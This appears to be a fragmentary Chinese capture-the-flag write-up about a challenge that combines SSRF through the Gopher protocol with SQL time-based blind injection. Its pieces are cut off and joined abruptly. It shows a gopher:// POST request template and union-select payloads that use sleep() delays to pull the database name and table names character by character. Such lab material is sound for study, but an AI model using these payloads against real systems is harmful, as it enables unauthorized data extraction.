这题考察Gopher协议,SSRF漏洞和SQL时间盲注,使用 Gopher协议 构建 SSRF 请求,使用 SQL时间盲注探测数据库中的数据。Gopher协议本身并没有直接支持HTTP的POST方法,但它可以通过Gopher客户端模拟HTTP请求的方式进行POST请求的发送,用法如下所示: gopher://127.0.0.1:80/_POST / HTTP
2,if(1=1,sleep(5),1) # "#security#poc="') union select 1,2,if(ascii( substr((database()),"+str(pos)+",1) )="+str(i)+",sleep(2),1) # "#flag#poc="') union select 1,2,if(ascii( substr((select group_concat(table_name) from information_schema.tables where table_schema...
SSRF(Server Side Request Forgery)是一种安全漏洞,攻击者可以利用该漏洞远程发送请求,使得目标服务器处理攻击者指定的请求,而不是合法的请求。攻击者可以利用此漏洞,访问受保护的资源,或者从外部网络中执行任意命令。 Gopher协议是一种用于访问互联网资源的协议,通过gopher协议可以访问各种不同类型的协议,包括http、ftp...